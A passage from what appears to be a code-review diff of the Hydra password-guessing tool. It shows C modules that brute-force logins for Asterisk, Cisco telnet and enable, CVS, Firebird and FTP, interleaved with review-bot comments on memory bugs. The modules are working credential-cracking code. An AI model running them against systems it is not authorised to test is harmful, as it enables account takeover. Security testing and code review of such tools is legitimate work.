sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_afp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
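Review bot: start_afp() copies a fixed AFP_MAX_USERNAME_LEN and AFP_MAX_PASSWORD_LEN bytes out of login and pass with memcpy, which reads past the end of any shorter string, including the one-byte `empty` literal; use a bounded string copy and terminate explicitly. The line above it has a related slip: strncpy copies at most AFP_SERVER_NAME_LEN - 1 bytes, but the terminator is written at index AFP_SERVER_NAME_LEN instead of AFP_SERVER_NAME_LEN - 1. In server_subconnect() the malloc'd `server` is overwritten by the return value of afp_server_full_connect(), so that allocation leaks, and conn_req is passed to memset without a NULL check. The failure branch of start_afp() returns 2 when HYDRA_EXIT is seen, which re-enters the cracking case instead of case 3; please confirm that is intended.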

137
hydra-asterisk.c Normal file

@ -0,0 +1,137 @@
//This plugin was written by david@
//
//This plugin is written for Asterisk Call Manager
//which is running by default on TCP/5038
//
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
int start_asterisk(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"";
char *login, *pass, buffer[1024];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s) > 0) {
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
free(buf);
}
memset(buffer, 0, sizeof(buffer));
sprintf(buffer, "Action: Login\r\nUsername: %.250s\r\nSecret: %.250s\r\n\r\n", login, pass);
if (verbose || debug)
hydra_report(stderr, "[VERBOSE] C: %s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (verbose || debug)
hydra_report(stderr, "[VERBOSE] S: %s\n", buf);
if (buf == NULL || (strstr(buf, "Response: ") == NULL)) {
hydra_report(stderr, "[ERROR] Asterisk Call Manager protocol error or service shutdown: %s\n", buf);
free(buf);
return 4;
}
if (strstr(buf, "Response: Success") != NULL) {
hydra_report_found_host(port, ip, "asterisk", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_asterisk(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ASTERISK, mysslport = PORT_ASTERISK_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = myport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
buf = hydra_receive_line(sock);
//fprintf(stderr, "%s\n",buf);
//banner should look like:
//Asterisk Call Manager/1.1
if (buf == NULL || strstr(buf, "Asterisk Call Manager/") == NULL) {
/* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an Asterisk Call Manager protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
}
free(buf);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_asterisk(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_asterisk_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
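Review bot: in the SSL branch of case 1 in service_asterisk(), `port = myport;` should be `port = mysslport;`. As written, an SSL run records the plaintext default port, and on the next reconnect `if (port != 0) mysslport = port;` points the SSL connect at that port. Two smaller items: case 3 has no return or break after hydra_child_exit(0), so it relies on that call never returning to avoid falling into default, and the banner check passes a NULL buf to a "%s" format when the receive fails.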

207
hydra-cisco-enable.c Normal file

@ -0,0 +1,207 @@
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
int start_cisco_enable(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass, buffer[300];
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "%.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf != NULL && strstr(buf, "assw") != NULL) {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "%.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (strstr(buf, "assw") != NULL) {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "%.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
}
}
if (buf != NULL
&& (strstr(buf, "assw") != NULL || strstr(buf, "ad ") != NULL || strstr(buf, "attempt") != NULL || strstr(buf, "fail") != NULL || strstr(buf, "denied") != NULL)) {
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
if (buf != NULL)
free(buf);
hydra_report_found_host(port, ip, "cisco-enable", fp);
hydra_completed_pair_found();
return 3;
}
void service_cisco_enable(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, failc = 0, retry = 1, next_run = 1, sock = -1;
int myport = PORT_TELNET, mysslport = PORT_TELNET_SSL;
char buffer[300];
char *login;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* Cisco AAA Support */
if (strlen(login = hydra_get_next_login()) != 0) {
while ((buf = hydra_receive_line(sock)) != NULL && strstr(buf, "name:") == NULL && strstr(buf, "ogin:") == NULL) {
if (hydra_strcasestr(buf, "ress ENTER") != NULL)
hydra_send(sock, "\r\n", 2, 0);
free(buf);
}
sprintf(buffer, "%.250s\r\n", login);
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send login\n", (int) getpid());
hydra_child_exit(2);
}
}
if (miscptr != NULL) {
while ((buf = hydra_receive_line(sock)) != NULL && strstr(buf, "assw") == NULL) {
if (hydra_strcasestr(buf, "ress ENTER") != NULL)
hydra_send(sock, "\r\n", 2, 0);
free(buf);
}
sprintf(buffer, "%.250s\r\n", miscptr);
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send login\n", (int) getpid());
hydra_child_exit(2);
}
}
buf = hydra_receive_line(sock);
if (hydra_strcasestr(buf, "ress ENTER") != NULL) {
hydra_send(sock, "\r\n", 2, 0);
free(buf);
buf = hydra_receive_line(sock);
}
if (strstr(buf, "assw") != NULL) {
fprintf(stderr, "[ERROR] Child with pid %d terminating - can not login, can not login\n", (int) getpid());
hydra_child_exit(2);
}
free(buf);
next_run = 2;
break;
}
case 2: /* run the cracking function */
{
unsigned char *buf2;
int f = 0;
sprintf(buffer, "%.250s\r\n", "ena");
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send 'ena'\n", (int) getpid());
hydra_child_exit(2);
}
do {
if (f != 0)
free(buf2);
else
f = 1;
if ((buf2 = (unsigned char *) hydra_receive_line(sock)) == NULL) {
if (failc < retry) {
next_run = 1;
failc++;
fprintf(stderr, "[ERROR] Child with pid %d was disconnected - retrying (%d of %d retries)\n", (int) getpid(), failc, retry);
sleep(3);
break;
} else {
fprintf(stderr, "[ERROR] Child with pid %d was disconnected - exiting\n", (int) getpid());
hydra_child_exit(0);
}
}
} while (strstr((char *) buf2, "assw") == NULL);
free(buf2);
if (next_run != 0)
break;
failc = 0;
next_run = start_cisco_enable(sock, ip, port, options, miscptr, fp);
break;
}
case 3: /* clean exit */
sprintf(buffer, "%.250s\r\n", "exit");
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not send 'exit'\n", (int) getpid());
hydra_child_exit(0);
}
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
hydra_child_exit(2);
}
run = next_run;
}
}
int service_cisco_enable_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
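Review bot: several hydra_receive_line() results are dereferenced without a NULL check. In start_cisco_enable() the second `buf = hydra_receive_line(s);` goes straight into `strstr(buf, "assw")`, although the first call is guarded with `buf != NULL`. In case 1 of service_cisco_enable() the line read after the AAA handling is passed to hydra_strcasestr() and strstr() unchecked. A dropped connection at either point is a NULL dereference; guard both the same way as the first call. The two `while ((buf = hydra_receive_line(sock)) != NULL && strstr(...) == NULL)` loops leave the matching line allocated when they exit, so free it after the loop. The default case calls hydra_child_exit() twice with different codes, and the "can not login, can not login" message repeats itself.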

198
hydra-cisco.c Normal file

@ -0,0 +1,198 @@
#ifdef PALM
#include "palm/hydra-mod.h"
#else
#include "hydra-mod.h"
#endif
extern char *HYDRA_EXIT;
char *buf;
int start_cisco(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass, buffer[300];
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
#ifdef PALM
sprintf(buffer, "%s\r\n", pass);
#else
sprintf(buffer, "%.250s\r\n", pass);
#endif
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
sleep(1);
do {
buf = hydra_receive_line(s);
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
} while (strlen(buf) <= 1);
if (strstr(buf, "assw") != NULL) {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
#ifdef PALM
sprintf(buffer, "%s\r\n", pass);
#else
sprintf(buffer, "%.250s\r\n", pass);
#endif
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
do {
buf = hydra_receive_line(s);
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
} while (strlen(buf) <= 1);
if (buf != NULL && strstr(buf, "assw") != NULL) {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
#ifdef PALM
sprintf(buffer, "%s\r\n", pass);
#else
sprintf(buffer, "%.250s\r\n", pass);
#endif
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
do {
buf = hydra_receive_line(s);
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
} while (strlen(buf) <= 1);
}
}
if (buf != NULL && (strstr(buf, "assw") != NULL || strstr(buf, "ad ") != NULL || strstr(buf, "attempt") != NULL || strstr(buf, "ailur") != NULL)) {
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
hydra_report_found_host(port, ip, "cisco", fp);
hydra_completed_pair_found();
if (buf != NULL)
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_cisco(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, failc = 0, retry = 1, next_run = 1, sock = -1;
int myport = PORT_TELNET, mysslport = PORT_TELNET_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
unsigned char *buf2;
int f = 0;
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
if (miscptr != NULL && hydra_strcasestr(miscptr, "enter") != NULL)
hydra_send(sock, "\r\n", 2, 0);
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
do {
if (f != 0)
free(buf2);
else
f = 1;
if ((buf2 = (unsigned char *) hydra_receive_line(sock)) == NULL) {
if (failc < retry) {
next_run = 1;
failc++;
hydra_report(stderr, "[ERROR] Child with pid %d was disconnected - retrying (%d of %d retries)\n", (int) getpid(), failc, retry);
sleep(3);
break;
} else {
hydra_report(stderr, "[ERROR] Child with pid %d was disconnected - exiting\n", (int) getpid());
hydra_child_exit(0);
}
}
if (buf2 != NULL && hydra_strcasestr(buf2, "ress ENTER") != NULL)
hydra_send(sock, "\r\n", 2, 0);
} while (strstr((char *) buf2, "assw") == NULL);
free(buf2);
if (next_run != 0)
break;
failc = 0;
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_cisco(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
#ifdef PALM
return;
#else
hydra_child_exit(2);
#endif
}
run = next_run;
}
}
int service_cisco_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
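Review bot: the three `do { buf = hydra_receive_line(s); ... } while (strlen(buf) <= 1);` loops in start_cisco() dereference buf before any NULL check, so a disconnect crashes the child. The `buf != NULL` tests further down come too late. An empty line makes `buf[strlen(buf) - 1]` index position -1, and each extra iteration overwrites buf without freeing the previous line. Check for NULL first, test the length before indexing, and free inside the loop. Under PALM the password is formatted with an unbounded "%s" into buffer[300], while the non-PALM path limits it to "%.250s"; the PALM path needs the same bound.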

151
hydra-cvs.c Normal file

@ -0,0 +1,151 @@
#include "hydra-mod.h"
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
char *buf;
int start_cvs(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[1024], pass2[513];
int i;
char *directory = miscptr;
/* evil cvs encryption sheme...
0 111 P 125 p 58
! 120 1 52 A 57 Q 55 a 121 q 113
" 53 2 75 B 83 R 54 b 117 r 32
3 119 C 43 S 66 c 104 s 90
4 49 D 46 T 124 d 101 t 44
% 109 5 34 E 102 U 126 e 100 u 98
& 72 6 82 F 40 V 59 f 69 v 60
' 108 7 81 G 89 W 47 g 73 w 51
( 70 8 95 H 38 X 92 h 99 x 33
) 64 9 65 I 103 Y 71 i 63 y 97
* 76 : 112 J 45 Z 115 j 94 z 62
+ 67 ; 86 K 50 k 93
, 116 < 118 L 42 l 39
- 74 = 110 M 123 m 37
. 68 > 122 N 91 n 61
/ 87 ? 105 O 35 _ 56 o 48
*/
char key[] = { 0, 120, 53, 0, 0, 109, 72, 108, 70, 64, 76, 67, 116, 74, 68, 87,
111, 52, 75, 119, 49, 34, 82, 81, 95, 65, 112, 86, 118, 110, 122, 105,
0, 57, 83, 43, 46, 102, 40, 89, 38, 103, 45, 50, 42, 123, 91, 35,
125, 55, 54, 66, 124, 126, 59, 47, 92, 71, 115, 0, 0, 0, 0, 56,
0, 121, 117, 104, 101, 100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,
58, 113, 32, 90, 44, 98, 60, 51, 33, 97, 62
};
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(pass2, 0, sizeof(pass2));
strncpy(pass2, pass, 512);
for (i = 0; i < strlen(pass); i++) {
pass2[i] = key[pass2[i] - 0x20];
}
snprintf(buffer, sizeof(buffer), "BEGIN VERIFICATION REQUEST\n%s\n%s\nA%s\nEND VERIFICATION REQUEST\n", directory, login, pass2);
i = 57 + strlen(directory) + strlen(login) + strlen(pass2);
if (hydra_send(s, buffer, i - 1, 0) < 0) {
return 1;
}
if (hydra_data_ready_timed(s, 5, 0) > 0) {
buf = hydra_receive_line(s);
if (strstr(buf, "I LOVE YOU\n")) {
hydra_report_found_host(port, ip, "cvs", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
return 3;
}
} else if (strstr(buf, "no such user") || strstr(buf, "E PAM start error: Critical error - immediate abort\n")) {
if (verbose) {
hydra_report(stderr, "[VERBOSE] User %s does not exist\n", login);
}
hydra_completed_pair_skip();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {
return 3;
}
}
/* "I HATE YOU\n" case */
free(buf);
return 3;
}
return 3;
}
void service_cvs(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_CVS, mysslport = PORT_CVS_SSL;
hydra_register_socket(sp);
if ((miscptr == NULL) || (strlen(miscptr) == 0)) {
miscptr = "/root";
}
while (1) {
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = start_cvs(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_cvs_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
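Review bot: start_cvs() frees buf twice. Both the "I LOVE YOU" branch and the "no such user" branch call free(buf) and, when HYDRA_EXIT is not seen, fall through to the `free(buf);` after the "I HATE YOU" comment. Free once on the common path, and check buf for NULL before the first strstr(). The scramble loop also needs bounds: `key[pass2[i] - 0x20]` is only valid for 0x20 through 0x7a (the table has 91 entries), so '{', '|', '}', '~', control characters and any byte with the high bit set index outside key. The loop runs to strlen(pass) even though pass2 holds at most 512 copied bytes, so a longer password writes past pass2. Finally, the send length is a hand-computed `57 + ...` minus one; use the snprintf return value or strlen(buffer) so it cannot drift from what was actually formatted.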

160
hydra-firebird.c Normal file

@ -0,0 +1,160 @@
/*
Firebird Support - by David Maciejak @ GMAIL dot com
you need to pass full path to the fdb file as argument
default account is SYSDBA/masterkey
on Firebird 2.0, access to the database file directly
is not possible anymore, in verbose mode you will see
the msg: "no permission for direct access to security database"
*/
#include "hydra-mod.h"
#ifndef LIBFIREBIRD
void dummy_firebird() {
printf("\n");
}
#else
#include <stdio.h>
#include <ibase.h>
#define DEFAULT_DB "C:\\Program Files\\Firebird\\Firebird_1_5\\security.fdb"
extern char *HYDRA_EXIT;
int start_firebird(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
char database[256];
char connection_string[1024];
isc_db_handle db; /* database handle */
ISC_STATUS_ARRAY status; /* status vector */
char *dpb = NULL; /* DB parameter buffer */
short dpb_length = 0;
if (miscptr)
strncpy(database, miscptr, sizeof(database));
else
strncpy(database, DEFAULT_DB, sizeof(database));
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
dpb_length = (short) (1 + strlen(login) + 2 + strlen(pass) + 2);
if ((dpb = (char *) malloc(dpb_length)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
/* Add user and password to dpb */
*dpb = isc_dpb_version1;
dpb_length = 1;
isc_modify_dpb(&dpb, &dpb_length, isc_dpb_user_name, login, strlen(login));
isc_modify_dpb(&dpb, &dpb_length, isc_dpb_password, pass, strlen(pass));
/* Create connection string */
snprintf(connection_string, sizeof(connection_string), "%s:%s", hydra_address2string(ip), database);
if (isc_attach_database(status, 0, connection_string, &db, dpb_length, dpb)) {
/* for debugging perpose */
if (verbose) {
hydra_report(stderr, "[VERBOSE] ");
isc_print_status(status);
}
isc_free(dpb);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
} else {
isc_detach_database(status, &db);
isc_free(dpb);
hydra_report_found_host(port, ip, "firebird", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
return 1;
}
void service_firebird(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_FIREBIRD, mysslport = PORT_FIREBIRD_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
/*
* Here we start the password cracking process
*/
next_run = start_firebird(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
#endif
int service_firebird_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
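Review bot: `strncpy(database, miscptr, sizeof(database));` leaves database unterminated when the supplied path is 256 bytes or longer, and the following snprintf reads it with "%s". Copy sizeof(database) - 1 bytes and set the last byte to 0, or use snprintf for the copy as well. The dpb buffer is obtained with malloc() but released with isc_free(); please confirm that pairing is valid for a buffer handed to isc_modify_dpb(). The return codes also look inverted on the failure path: when HYDRA_EXIT is seen it returns 2, which runs start_firebird() again, while the success path returns 3 for the same condition.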

188
hydra-ftp.c Normal file

@ -0,0 +1,188 @@
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
int start_ftp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"";
char *login, *pass, buffer[510];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "USER %.250s\r\n", login);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
/* special hack to identify 530 user unknown msg. suggested by Jean-Baptiste.BEAUFRETON@turbomeca.fr */
if (buf[0] == '5' && buf[1] == '3' && buf[2] == '0') {
hydra_completed_pair_skip();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 4;
free(buf);
return 1;
}
// for servers supporting anon access without password
if (buf[0] == '2') {
hydra_report_found_host(port, ip, "ftp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 4;
free(buf);
return 1;
}
if (buf[0] != '3') {
if (buf) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf);
free(buf);
}
return 3;
}
free(buf);
sprintf(buffer, "PASS %.250s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
if (buf[0] == '2') {
hydra_report_found_host(port, ip, "ftp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 4;
free(buf);
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 4;
return 2;
}
void service_ftp_core(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, int tls) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_FTP, mysslport = PORT_FTP_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
hydra_child_exit(0);
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
usleep(250);
buf = hydra_receive_line(sock);
if (buf == NULL || buf[0] != '2') { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
if (buf != NULL)
free(buf);
hydra_child_exit(2);
}
while (buf != NULL && strncmp(buf, "220 ", 4) != 0 && strstr(buf, "\n220 ") == NULL) {
free(buf);
buf = hydra_receive_line(sock);
}
free(buf);
//this mode is manually chosen, so if it fails we giving up
if (tls) {
if (hydra_send(sock, "AUTH TLS\r\n", strlen("AUTH TLS\r\n"), 0) < 0) {
hydra_child_exit(2);
}
buf = hydra_receive_line(sock);
if (buf == NULL) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an FTP protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
}
if (buf[0] == '2') {
if ((hydra_connect_to_ssl(sock) == -1) && verbose) {
hydra_report(stderr, "[ERROR] Can't use TLS\n");
hydra_child_exit(2);
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
} else {
hydra_report(stderr, "[ERROR] TLS negotiation failed %s\n", buf);
hydra_child_exit(2);
